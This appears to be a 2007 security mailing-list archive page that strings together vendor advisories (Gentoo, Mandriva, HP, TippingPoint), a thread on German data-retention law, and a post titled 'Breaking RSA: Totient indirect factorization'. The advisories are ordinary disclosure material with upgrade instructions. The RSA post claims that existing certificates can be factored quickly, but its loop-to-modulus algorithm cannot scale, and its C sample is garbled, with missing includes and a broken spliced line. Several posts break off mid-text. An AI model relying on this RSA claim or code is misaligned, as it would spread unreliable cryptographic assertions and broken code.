[ GLSA 200711-20 ] Pioneers: Denial of Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200711-20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Pioneers: Denial of Service Date: November 14, 2007 Bugs: #198807 ID: 200711-20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability has been discovered in Pioneers, possibly resulting in a Denial of Service. Background == Pioneers (formerly gnocatan) is a clone of the popular board game "The Settlers of Catan". Affected packages = --- Package / Vulnerable / Unaffected --- 1 games-board/pioneers < 0.11.3 >= 0.11.3 Description === Bas Wijnen discovered that the Pioneers server may free sessions objects while they are still in use, resulting in access to invalid memory zones. Impact == A remote attacker could send specially crafted data to the vulnerable server, resulting in a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All Pioneers users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=games-board/pioneers-0.11.3" References == [ 1 ] CVE-2007-5933 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5933 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200711-20.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHO3KAuhJ+ozIKI5gRAuqNAJ4qsKRL2X+QAwHrfYVd2a+XG8iuzQCgnWNu usSD3uazJ2TJkCor/qlCu3k= =7Cf4 -END PGP SIGNATURE-
Re: Standing Up Against German Laws - Project HayNeedle
Hello. On Tue, Nov 13, 2007 at 04:38:39PM -0500, [EMAIL PROTECTED] wrote: > On Tue, 13 Nov 2007 13:07:02 PST, johan beisser said: > > The logs don't contain context, just who/where/when. While > > encryption will prevent (one hopes) the capability of recovering > > context, who you talked to is not kept private or otherwise secret. > > It's probably a good idea to deploy encryption *now*, and use it for > *everything*, and be ready for when (not if) they decide to be more > draconian in their logging requirements. AFAIR the German situation is as follows: Any German email provider having more than 1000 customers has to provide a method for giving government access to the mailbox including the ability to read the content. Access should be controlled by judges. If there are more than 1 customers it has to be done with hardware, so called sina boxes. Even if there is not a precise definition of customer (person, company, contract) it is quite clear that the law has got an impact on users of t-online, web.de, GMX, Freenet and others. This law started Jan 1st, 2005. The data retention law is a possibility to analyze social networks even if email is encrypted. There are other purposes, too. regards Frank
Breaking RSA: Totient indirect factorization
Breaking RSA: Totient indirect factorization
=
Author: Alex Bassas Serramia
(I'm very sorry for my poor english but it's not my first language).
Introduction
This document tries to expose an algorithm that allows the RSA
modulus' totien factorization and then
breaking RSA.
RSA algorithm
-
RSA algorithm is generated the following way:
1) m = p*q-> RSA modulus
2) t = (p-1)*(q-1)-> totien(m)
3) (e*d) mod t = 1 mod t
4) a^e mod m = b
5) b^d mod m = a
e = public key
d = private key
RSA strength
Equation (3) shows that is possible to recover private key "d" knowing
public key "e" and totient "t".
"a^n mod m" sequence
To know about totien we have to examine the sequence "a^n mod m", one
sample is "2^n mod 11" (n from 1 to 11)
with totien 10:
2, 4, 8, 5, 10, 9, 7, 3, 6,*1, 2
At "n=10" we have one "1" because "a^totien(m) mod m" is always one
(Euler's theorem).
The sequence "3^n mod 11" has the same totien 10:
3, 9, 5, 4,*1, 3, 9, 5, 4,*1, 3
but we have two "1", "n=5" y "n=10" (totien), in this case we can
observe the cyclic nature of the "a^n mod m"
because we always have the same list of numbers before each "1".
"a^n mod m = 1" equation
The cyclic nature of the "a^n mod m" sequence take us to the first statement:
1) - The exponent's values of the "a^n mod m = 1" solutions are always
totien's divisors.
The sequence "3^n mod 11" has "5" and "10" as solutions, they are
totien's divisors (totien(11) = 10).
3, 9, 5, 4,*1, 3, 9, 5, 4,*1, 3
Maximazing "a^n mod m = 1" solutions
The second statement is:
2) - If "x" is a totien's divisor then "a^x^n mod m = 1" will
multiply the
"a^n mod m = 1" solutions by "x".
Ex.: The "2^n mod 11" sequence has one "1"
2, 4, 8, 5, 10, 9, 7, 3, 6,*1, 2
"2^5^n=32^n", "32^n mod 11" produces 5 ones:
10,*1, 10,*1, 10,*1, 10,*1, 10,*1, 10
"a^n mod m = 1" limit
-
The third statement is:
3) - If x is not yet a totien's divisor then "a^x^n mod m = 1"
will have the same
solutions that "a^n mod m = 1" but with the values permuted.
Ex.: The "2^n mod 11" sequence has one "1"
2, 4, 8, 5, 10, 9, 7, 3, 6,*1, 2
"2^2^n= 4^n", "4^n mod 11" has two "1"
4, 5, 9, 3,*1, 4, 5, 9, 3,*1, 4
"4^2^n= 16^n", "16^n mod 11" is still having two "1" but with the
values permuted.
5, 3, 4, 9,*1, 5, 3, 4, 9,*1, 5
Ending the sequence
The last statement is:
4) - If "a" contains by power all the totien's divisors then
"a^n mod m" will
always be "1".
Ex.: "2^2^5^n= 1024^n mod 11
*1,*1,*1,*1,*1,*1,*1,*1,*1,*1,*1
Euler's extension
-
This statement is a consequence of the statement number 3 but I don't
use it in the algorithm.
5) - If "n" is greater than the biggest number of the
coincidents totient's
divisors then:
a^((n-1)(t*(t+1)/2)) mod m = 1 mod m(t = totien(m))
Algorithm
-
- Repeat "a = a^n mod m" with n from 2 to m, saving all the results in
a table until a == 1 (Statement 4).
- Examine the table from end to begining printing "n" if the number of
"ones" is divided by "n" (Statements 1,2,3),
Impact
--
PKI vendors must change modulus generator algorithms to discard totients with
lower factors. Current certificates can be factorized in lower time
than expected
and compromised, vendors must review each one separately.
Credits
Alex Bassas serramia
Barcelon (SPAIN)
Sample
--
/*
(c) Alex Bassas Serramia,
Barcelona,
SPAIN.
*/
#ifdef WIN32
#include
#include
#else
typedef long long ULONG64;
#define TRUE (-1)
#define FALSE (0)
#endif
#include
#include
ULONG64 getrand (void) {
ULONG64 n,num;
for (n=0;n<8;n++) {
num = (num << 8) | (rand()%256);
}
return (num);
}
ULONG64 expmod (ULONG64 x,ULONG64 n,ULONG64 m) {
ULONG64 r = 1;
while (n) {
if (n&1) {
r = (r*x)%m;
n = n - 1;
}
x = (x*x)%m;
n = n / 2;
}
return (r);
}
int isprime (ULONG64 p) {
ULONG64 k,a;
for (k=0;k<8;k++) {
a = getrand() % p;
if (expmod(a,p-1,p) != 1) {
return (FALSE);
}
}
return (TRUE);
}
ULONG64 value (ULONG64 bits) {
ULONG64 n;
n = 1 << bits;
return (n);
}
ULONG64 getprime (ULONG64 bits,ULONG64 mbits) {
ULONG64 num,m;
m = value(mbits);
do {
num = getrand();
if (bits < 64) {
num %= value(bits);
}
}
while ((num=0;n--) {
read_reg (f,n,&a);
read_reg (f,n+1,&b);
r = expmod (a.base,e,m);
if (r != 1) {
printf ("reverse\texp = %I64i\r\n",a.ex
[ GLSA 200711-19 ] TikiWiki: Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200711-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: TikiWiki: Multiple vulnerabilities Date: November 14, 2007 Bugs: #195503 ID: 200711-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities have been discovered in TikiWiki, possibly resulting in the remote execution of arbitrary code. Background == TikiWiki is an open source content management system written in PHP. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 www-apps/tikiwiki < 1.9.8.3 >= 1.9.8.3 Description === Stefan Esser reported that a previous vulnerability (CVE-2007-5423, GLSA 200710-21) was not properly fixed in TikiWiki 1.9.8.1 (CVE-2007-5682). The TikiWiki development team also added several checks to avoid file inclusion. Impact == A remote attacker could exploit these vulnerabilities to inject arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All TikiWiki users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-apps/tikiwiki-1.9.8.3" References == [ 1 ] GLSA 200710-21 http://www.gentoo.org/security/en/glsa/glsa-200710-21.xml [ 2 ] CVE-2007-5423 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5423 [ 3 ] CVE-2007-5682 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5682 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200711-19.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHO2/0uhJ+ozIKI5gRApqxAJ9f523yR0Xs6IX7mlfsvwb9rL6lKwCeI74G QUpCYYjgvTMZ+iTcc6Xopr4= =xATD -END PGP SIGNATURE-
[ GLSA 200711-18 ] Cpio: Buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200711-18 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Cpio: Buffer overflow Date: November 14, 2007 Bugs: #196978 ID: 200711-18 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis GNU cpio contains a buffer overflow vulnerability, possibly resulting in a Denial of Service. Background == GNU cpio copies files into or out of a cpio or tar archive. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 app-arch/cpio < 2.9-r1 >= 2.9-r1 Description === A buffer overflow vulnerability in the safer_name_suffix() function in GNU cpio has been discovered. Impact == A remote attacker could entice a user to open a specially crafted archive file resulting in a stack-based buffer overflow, possibly crashing the application. It is disputed whether the execution of arbitrary code is possible. Workaround == There is no known workaround at this time. Resolution == All GNU cpio users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-arch/cpio-2.9-r1" References == [ 1 ] CVE-2007-4476 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4476 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200711-18.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHO2u2uhJ+ozIKI5gRAmnOAJwMQ1PcCPV7njoFZjURGIq8yaMcNwCglXrY rzGwkgPMnvNOL4Kevl6kEns= =m21S -END PGP SIGNATURE-
TPTI-07-20: Apple Quicktime Movie Stack Overflow Vulnerability
TPTI-07-20: Apple Quicktime Movie Stack Overflow Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-07-20 November 12, 2007 -- CVE ID: CVE-2007-4674 -- Affected Vendor: Apple -- Affected Products: QuickTime 7.2 -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Apple Quicktime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of a malformed movie atom. Specifying a large size will result in a stack overflow. If exploited, remote code execution can be achieved with the credentials of the logged in user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://docs.info.apple.com/article.html?artnum=306896 -- Disclosure Timeline: 2007.10.19 - Vulnerability reported to vendor 2007.11.12 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Cody Pierce - TippingPoint DVLabs.
Re: Standing Up Against German Laws - Project HayNeedle
Hi Raju, On Nov 14, 2007 3:20 AM, Raj Mathur <[EMAIL PROTECTED]> wrote: > The mail addresses can only be stored if the server through which the > mail is relayed (or on which it originates) falls under the law. I'd > presume that's not a significant percentage of all mails sent out from > any country. > (a) (as you say) they can of course be trivially extracted from the traffic flow at the provider level. cf the current EFF / NSA / San Francisco case - that (as I understand it) is probably in breach of the US Constitution, yet it happened/is happening. The German law, and similar laws in the UK and other countries, implicitly (at least) enables such tactics; (b) most mail users use mail servers at their employers or their local ISP (ISPs with retail presence in multiple territories will of course have mail servers in situated locally); (c) the balance, excluding those weirdos running their own personal MTA / MSAs, will be using webmail services like Hotmail and Gmail. Tracerouting from the machine I'm typing this on (in the UK) shows a route through my ISP, to LINX (the London IX), and then straight into Google space. The RTT all the way to the final hop is in the 30ms range: [...] 8 209.85.248.80 (209.85.248.80) 25.302 ms 24.348 ms 25.605 ms MPLS Label 548800 TTL=1 9 209.85.248.79 (209.85.248.79) 27.972 ms 36.281 ms 26.562 ms 10 72.14.233.77 (72.14.233.77) 28.266 ms 29.057 ms 27.273 ms 11 66.249.94.146 (66.249.94.146) 29.517 ms 30.668 ms 30.179 ms 12 ik-in-f19.google.com (66.249.91.19) 28.092 ms 27.926 ms 28.564 ms ...which strongly suggests to me that the front-end Gmail webserver my "mail" hits is probably pretty close to me. It's certainly not on the other side of the Atlantic. There's quite a lot of cooperation between EU member states, would a "UKUSA"-type arrangement in the EU be very surprising? =i On Nov 14, 2007 3:20 AM, Raj Mathur <[EMAIL PROTECTED]> wrote: > On Tuesday 13 November 2007 15:29, Florian Echtler wrote: > > [snip] > > As a native German speaker, allow me to clarify: with respect to IP > > communication, the law mandates saving the following information for > > 6 months: > > > > - which customer was assigned which IP for what timespan > > - sender mail address, receiver mail address and sender IP for each > > mail - in case of VOIP: caller and callee phone number and IP address > > The mail addresses can only be stored if the server through which the > mail is relayed (or on which it originates) falls under the law. I'd > presume that's not a significant percentage of all mails sent out from > any country. > > Of course, it's also possible to track (snoop) all SMTP traffic on the > network, but that's totally different from just keeping mail and AAA > server logs and from my understanding that's not what this law > mandates. > > Regards, > > -- Raju > -- > Raj Mathur[EMAIL PROTECTED] http://kandalaya.org/ > Freedom in Technology & Software || February 2008 || http://freed.in/ >GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F > PsyTrance & Chill: http://schizoid.in/ || It is the mind that moves > -- And what exactly is a dream? And what exactly is a joke? - Syd Barrett
[ GLSA 200711-17 ] Ruby on Rails: Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200711-17 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Ruby on Rails: Multiple vulnerabilities Date: November 14, 2007 Bugs: #195315, #182223 ID: 200711-17 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Several vulnerabilities were found in Ruby on Rails allowing for file disclosure and theft of user credentials. Background == Ruby on Rails is a free web framework used to develop database-driven web applications. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-ruby/rails < 1.2.5 >= 1.2.5 Description === candlerb found that ActiveResource, when processing responses using the Hash.from_xml() function, does not properly sanitize filenames (CVE-2007-5380). The session management functionality allowed the "session_id" to be set in the URL (CVE-2007-5380). BCC discovered that the to_json() function does not properly sanitize input before returning it to the user (CVE-2007-3227). Impact == Unauthenticated remote attackers could exploit these vulnerabilities to determine the existence of files or to read the contents of arbitrary XML files; conduct session fixation attacks and gain unauthorized access; and to execute arbitrary HTML and script code in a user's browser session in context of an affected site by enticing a user to browse a specially crafted URL. Workaround == There is no known workaround at this time. Resolution == All Ruby on Rails users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-ruby/rails-1.2.5" References == [ 1 ] CVE-2007-3227 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3227 [ 2 ] CVE-2007-5379 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5379 [ 3 ] CVE-2007-5380 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5380 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200711-17.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHO2VEuhJ+ozIKI5gRAhtQAJ4/nC4Lhyg3HnpGUcyPSr7JIq5BrACfR6vF jsBmdVGMQCK1OV5oGd1Pnlc= =aSWR -END PGP SIGNATURE-
Re: Standing Up Against German Laws - Project HayNeedle
On Tuesday 13 November 2007 15:29, Florian Echtler wrote: > [snip] > As a native German speaker, allow me to clarify: with respect to IP > communication, the law mandates saving the following information for > 6 months: > > - which customer was assigned which IP for what timespan > - sender mail address, receiver mail address and sender IP for each > mail - in case of VOIP: caller and callee phone number and IP address The mail addresses can only be stored if the server through which the mail is relayed (or on which it originates) falls under the law. I'd presume that's not a significant percentage of all mails sent out from any country. Of course, it's also possible to track (snoop) all SMTP traffic on the network, but that's totally different from just keeping mail and AAA server logs and from my understanding that's not what this law mandates. Regards, -- Raju -- Raj Mathur[EMAIL PROTECTED] http://kandalaya.org/ Freedom in Technology & Software || February 2008 || http://freed.in/ GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F PsyTrance & Chill: http://schizoid.in/ || It is the mind that moves
[ MDKSA-2007:218 ] - Updated mono packages fix arbitrary code execution vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:218 http://www.mandriva.com/security/ ___ Package : mono Date: November 14, 2007 Affected: 2007.0, 2007.1, 2008.0 ___ Problem Description: IOActive Inc. found a buffer overflow in Mono.Math.BigInteger class in Mono 1.2.5.1 and previous versions, which allows arbitrary code execution by context-dependent attackers. Updated packages fix this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5197 ___ Updated Packages: Mandriva Linux 2007.0: b9d567706da7df90b47ba3a7d19860bc 2007.0/i586/jay-1.1.17.1-5.3mdv2007.0.i586.rpm 8761f440233b19cd1cd0a89f570645ab 2007.0/i586/libmono-runtime-1.1.17.1-5.3mdv2007.0.i586.rpm ec8c893fb7dce3ac0a84a25354ae5b71 2007.0/i586/libmono0-1.1.17.1-5.3mdv2007.0.i586.rpm be7674691a7e993be13a4881cdf8e1c4 2007.0/i586/libmono0-devel-1.1.17.1-5.3mdv2007.0.i586.rpm dd69d1b1d77a970bbd69deeca3cba072 2007.0/i586/mono-1.1.17.1-5.3mdv2007.0.i586.rpm 4be1187e19e3cbfc571418dc05c29194 2007.0/i586/mono-data-sqlite-1.1.17.1-5.3mdv2007.0.i586.rpm 19f7a6a36839e454b744f082792a95e5 2007.0/i586/mono-doc-1.1.17.1-5.3mdv2007.0.i586.rpm 05069e51e4b6e18973bd3727af71eda4 2007.0/SRPMS/mono-1.1.17.1-5.3mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 6821742c220f15a204f6c11e1097da73 2007.0/x86_64/jay-1.1.17.1-5.3mdv2007.0.x86_64.rpm 434778d7a971fdccea1e0f2186e964f9 2007.0/x86_64/lib64mono0-1.1.17.1-5.3mdv2007.0.x86_64.rpm 656169f3f2901ff4fa9de7b895a97333 2007.0/x86_64/lib64mono0-devel-1.1.17.1-5.3mdv2007.0.x86_64.rpm 1f4e0426187652ba278fe7ff2d6b097b 2007.0/x86_64/libmono-runtime-1.1.17.1-5.3mdv2007.0.x86_64.rpm 51f510ba19d6c613a5a0569291c449f8 2007.0/x86_64/mono-1.1.17.1-5.3mdv2007.0.x86_64.rpm 4b3a0a3bf7eee78062dcd71bd2ba5889 2007.0/x86_64/mono-data-sqlite-1.1.17.1-5.3mdv2007.0.x86_64.rpm 3591ed164f177be930c137395e7aa59f 2007.0/x86_64/mono-doc-1.1.17.1-5.3mdv2007.0.x86_64.rpm 05069e51e4b6e18973bd3727af71eda4 2007.0/SRPMS/mono-1.1.17.1-5.3mdv2007.0.src.rpm Mandriva Linux 2007.1: cd8398d38826f2c2b1f4c1ebdbc05d4e 2007.1/i586/jay-1.2.3.1-4.1mdv2007.1.i586.rpm d2fde2f68ec91f4ac815de617c36a54d 2007.1/i586/libmono0-1.2.3.1-4.1mdv2007.1.i586.rpm f084c0e39b28522e50e1929726c00e87 2007.1/i586/libmono0-devel-1.2.3.1-4.1mdv2007.1.i586.rpm cc4e1ec31cdedda7ffea4dfa907e75b0 2007.1/i586/mono-1.2.3.1-4.1mdv2007.1.i586.rpm d2bbc574fd1d9ec309d760da6ed310f6 2007.1/i586/mono-bytefx-data-mysql-1.2.3.1-4.1mdv2007.1.i586.rpm a3e21245b230ab317925ab948125ffd6 2007.1/i586/mono-data-1.2.3.1-4.1mdv2007.1.i586.rpm fe40d27e56faac9c2d9167ebed3aaf48 2007.1/i586/mono-data-firebird-1.2.3.1-4.1mdv2007.1.i586.rpm 8b023626db80ca7d2b452ce1f9582462 2007.1/i586/mono-data-oracle-1.2.3.1-4.1mdv2007.1.i586.rpm a91ed3d8d46c3da92fa0484a4584d21c 2007.1/i586/mono-data-postgresql-1.2.3.1-4.1mdv2007.1.i586.rpm bba894fa17420fc37ff97946d28fb7a9 2007.1/i586/mono-data-sqlite-1.2.3.1-4.1mdv2007.1.i586.rpm d4556931bee6df1b31216ecbd1c9c09d 2007.1/i586/mono-data-sybase-1.2.3.1-4.1mdv2007.1.i586.rpm 7fd252b712567dd27d73bd6cd12d 2007.1/i586/mono-doc-1.2.3.1-4.1mdv2007.1.i586.rpm 1f681e0ef96b53c40526fae5aaa9e78c 2007.1/i586/mono-extras-1.2.3.1-4.1mdv2007.1.i586.rpm de3caa8e2c13781dc9cf40c50a78b73c 2007.1/i586/mono-ibm-data-db2-1.2.3.1-4.1mdv2007.1.i586.rpm f406edad2c786cb651f2637d8a7a206b 2007.1/i586/mono-jscript-1.2.3.1-4.1mdv2007.1.i586.rpm 34820957e0678deeb59537c194ae8cee 2007.1/i586/mono-locale-extras-1.2.3.1-4.1mdv2007.1.i586.rpm 6a2a33508c23763e0d66714017d13cb0 2007.1/i586/mono-nunit-1.2.3.1-4.1mdv2007.1.i586.rpm cd73df7c62fe129a21c7ce6c46a21fa5 2007.1/i586/mono-web-1.2.3.1-4.1mdv2007.1.i586.rpm 791cc17afcc4cc1446e4bf5f0483ba69 2007.1/i586/mono-winforms-1.2.3.1-4.1mdv2007.1.i586.rpm 5a2decbedede539c73c34cd2abe53c9c 2007.1/SRPMS/mono-1.2.3.1-4.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 4a4cd3e01867703e87629c1803bc1fd2 2007.1/x86_64/jay-1.2.3.1-4.1mdv2007.1.x86_64.rpm 04a0cd2fa60cfed84164758a04fe381a 2007.1/x86_64/lib64mono0-1.2.3.1-4.1mdv2007.1.x86_64.rpm 5abe1519303796c34ed013705b3e8eff 2007.1/x86_64/lib64mono0-devel-1.2.3.1-4.1mdv2007.1.x86_64.rpm c91bab9f4fb6f53425b1d8f05f5adaf6 2007.1/x86_64/mono-1.2.3.1-4.1mdv2007.1.x86_64.rpm 9473cb69096d859f36c42778ff48f71d 2007.1/x86_64/mono-bytefx-data-mysql-1.2.3.1-4.1mdv2007.1.x86_64.rpm e1d135f40c1373897186701da080c8e1 2007.1/x86_64/mono-data-1.2.3.1-4.1mdv2007.1.x86_64.rpm 740160f5eadbb54ed7b3c1215370ea88 2007.1/x86_64/mono-data-firebird-1.2.3.1-4.1mdv2007.1.x86
[security bulletin] HPSBMA02288 SSRT071465 rev.1 - HP OpenView Operations (OVO) Running on HP-UX and Solaris, Remote Unauthorized Access, Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01269450 Version: 1 HPSBMA02288 SSRT071465 rev.1 - HP OpenView Operations (OVO) Running on HP-UX and Solaris, Remote Unauthorized Access, Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-11-13 Last Updated: 2007-11-13 Potential Security Impact: Remote unauthorized access, Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in OpenView Operations (OVO) running on HP-UX and Solaris. These vulnerabilities may be exploited remotely to gain unauthorized access or to create a Denial of Service (DoS). References: SUN Alert 102995, 102997, CVE-2007-3922, CVE-2007-3698 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OpenView Operations(OVO) 7.1X and 8.X running on HP-UX B.11.11, B.11.23, B.11.31, and Solaris. BACKGROUND Note: The following is for use by the HP-UX Software Assistant. Only the HP-UX versions are listed. AFFECTED VERSIONS For OVO 7.1X HP-UX B.11.11 = OVOPC-WWW.OVOPC-WWW-GUI action: install PHSS_37197 or subsequent For OVO 8.X HP-UX B.11.11 HP-UX B.11.23 (PA) = OVOPC-WWW.OVOPC-WWW-GUI action: install PHSS_37183 or subsequent HP-UX B.11.23 (IA) HP-UX B.11.31 = OVOPC-WWW.OVOPC-WWW-GUI action: install PHSS_37182 or subsequent END AFFECTED VERSIONS RESOLUTION HP has provided the following patches to resolve the vulnerabilities. The patches can be downloaded from http://support.openview.hp.com/patches/ OVO 7.1X HP-UX B.11.11 PHSS_37197 or subsequent OVO 7.1X Solaris ITOSOL_00619 or subsequent OVO 8.X HP-UX B.11.11 PHSS_37183 or subsequent OVO 8.X HP-UX B.11.23 (PA) PHSS_37183 or subsequent OVO 8.X HP-UX B.11.23 (IA) PHSS_37182 or subsequent OVO 8.X HP-UX B.11.31 PHSS_37182 or subsequent OVO 8.X Solaris ITOSOL_00618 or subsequent MANUAL ACTIONS: No PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa HISTORY Version: 1 (rev.1) - 13 November 2007 Initial release Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the ap
Six Remote Memory Corruption Vulnerabilities in IBM WebSphere MQ 6.0
IRM, leaders in messaging systems security, have discovered six remote vulnerabilities in IBM WebSphere MQ 6.0. The vulnerabilities are currently being investigated by IBM and once patches have been developed, advisories will be published including full technical details and links to patch download information. More information is available here: http://www.irmplc.com/index.php/158-Messaging-System-Security
Konqueror Remote Denial Of Service
